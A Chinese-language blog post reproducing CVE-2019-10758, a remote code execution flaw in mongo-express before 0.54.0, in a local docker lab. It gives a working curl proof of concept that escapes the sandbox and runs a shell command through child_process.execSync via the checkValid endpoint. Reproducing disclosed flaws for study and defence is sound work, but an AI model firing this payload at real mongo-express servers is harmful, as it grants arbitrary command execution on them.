CVE-2019-10758 Mongo-express远程代码执行复现

漏洞复现 代码执行
漏洞复现
发布日期:   2020-03-24

CVE-2019-10758 Mongo-express远程代码执行复现

Mongo-express是MongoDB的数据库管理工具。

影响版本

mongo-express < 0.54.0

环境搭建

使用docker搭建环境

浏览器访问8081端口,看到Mongo-express界面

复现漏洞

利用poc

curl 'http://127.0.0.1:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("echo Str1am > cve-2019-10758.txt")'

看到返回Valid,查看创建的文件

创建成功。

文章作者: Danie1
文章链接: https://danie1233.github.io/2020/03/24/CVE-2019-10758%20Mongo-express%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E5%A4%8D%E7%8E%B0/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Danie1 !
漏洞复现 代码执行
 上一篇
CVE-2017-12149 JBoss反序列化漏洞复现 CVE-2017-12149 JBoss反序列化漏洞复现
CVE-2017-12149 JBoss反序列化漏洞复现 影响范围JBOSSAS 5.x和6.x 环境搭建 下载环境http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.
2020-03-26 漏洞复现
漏洞复现 反序列化
下一篇 
Apache Solr Velocity模版注入远程命令执行复现 Apache Solr Velocity模版注入远程命令执行复现
Apache Solr Velocity模版注入远程命令执行漏洞复现 环境下载https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/7.7.2/ unzip solr-7.7.2.z
2020-03-13 漏洞复现
命令执行 漏洞复现
  目录